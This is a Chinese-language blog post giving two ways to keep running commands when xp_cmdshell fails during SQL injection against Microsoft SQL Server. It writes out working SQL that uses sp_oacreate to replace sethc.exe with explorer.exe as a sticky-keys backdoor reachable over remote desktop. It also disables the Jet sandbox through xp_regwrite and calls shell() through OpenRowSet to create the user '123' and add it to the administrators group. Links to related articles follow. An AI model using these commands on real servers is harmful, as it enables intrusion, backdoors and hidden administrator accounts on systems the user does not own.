mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

最新推荐文章于 2021-08-20 15:03:53 发布
最新推荐文章于 2021-08-20 15:03:53 发布
阅读量6.5k 收藏 1
点赞数 1
分类专栏: SQL 技术 文章标签: xp database windows shell null oo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/6361234
版权

mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。

    微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。

    原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:

1、替换shift文件(在开启3389情况下):

    下面两条语句为分别执行的。

    这条语句将explorer.exe复制为sethc.exe

    declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';

    这条语句将sethc.exe复制到dllcache目录下

    declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';

    另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。

2、直接开启acess的沙盘(沙盒),来执行命令:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators 123 /add")');

注意:如果是 Windows 2000,则将以上 Windows 目录改成 winnt。

Yatere
关注
专栏目录
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。有关启用‘xp_cmdshell’的详细信息,请参阅sQL帮助文件。
1433修复命令大全 提权错误修复.txt
03-13
1433修复命令大全 提权错误修复.txt
执行xp_cmdshell时发生错误--xpsql.cpp: 错误 5 来自 CreateProcess
09-25 5037
错误代码:xpsql.cpp: 错误 5 来自 CreateProcess 错误原因分析:xp_cmdshell没有执行CMD的权限。 解决方法:给CMD添加system的执行权限。
关于master..xp_cmdshell’的几个错误解决办法
雅冰石的专栏
01-22 1万+
错误一:Error Message:未能找到存储过程 ‘master..xp_cmdshell’。 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc ‘xp_cmdshell’ 服务器: 消息 3701,级别 11,状态 5,行 1 第二步恢复:
SQL SERVER 2008 执行xp_cmdshell的过程中出错,调用createprocess失败,错误代码 5 解决方案
热门推荐
u012949335的专栏
03-20 1万+
1、进入 控制面板----管理工具------本地安全策略 点击 本地策略--------安全选项 把“网络安全:LAN管理器身份验证级别”双击打开,选择“发送LM和NTLM响应”(原来是“没有定义”)。确认后,重新启动服务器,该问题即能解决。 ...
SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器
Auspicious航的博客
03-05 1882
1、SQL Server2008数据库在进行开启复制分发的配置时,出现了报错: 正在配置... - 正在配置分发服务器 (错误) 消息 SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器。 (Microsoft.SqlServer.ConnectionInfo) ------------------------------ 其他信息: 执行 Tr...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7848
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
在执行xp_cmdshell的过程中出错,调用'LogonUserW'失败,错误代码:'1909'
weixin_33856370的博客
10-23 835
     在上篇文章Could not obtain information about Windows NT group/user 'xxxx\xxxx', error code 0x5里面,我介绍了SQL Server服务启动账号域账号锁定的情况下,有些Job Owner为域账号的作业执行会报错,其实在域账号被锁定的情况下(该域账号是SQL Server服务的启动账号),执行xp_cmdshe...
EXEC开启xp_cmdshell存储过程
weixin_38168918的博客
07-25 175
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure 'show advanced options', 0; RECONFIGURE; 转载于:https://www.cnblogs.c...
设置sqlxp_cmdshell 可执行
weixin_34082789的博客
10-30 230
2019独角兽企业重金招聘Python工程师标准>>> ...
MSSQL 2008 非sysadmin使用 xp_cmdshell权限
heavstar的专栏
06-08 2448
SQL SERVER 中 xp_cmdshell 可执行shell命令,常被黑客用来作提权操作.  因此,安全高的数据库服务器都限制使用xp_cmdshell或干脆禁止. 但实际业务中,使用bcp导出文件,过程中执行DTS包等都需要调用xp_cmdshell    非 sysadmin用户开通xp_cmdshell功能注意事项     一.xp_cmdshell 赋权,   前提是us
mssql数据库提权中xp_cmdshell使用
Sindy666的博客
08-20 1890
mssql数据库提权中xp_cmdshell使用 获得sa密码后蚁剑连接数据库,可用xp_cmdshell执行系统命令 xp, extend procedure, 表示本存储过程是扩展的存储过程 cmdshell, command shell, 直接敲命令行执行 判断是否存在xp_cmdshell select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回1证明存在xp_cmdshell xp_c
SQL Server如何启用和禁用远程管理的xp_cmdshell组件
qq_37233070的博客
05-22 1187
【错误描述】: SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。有关启用‘xp_cmdshell’的详细信息,请参阅sQL帮助文件。 【原因分析】:   xp_cmdshell可以让系统管理员以操作系统命令行解释器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值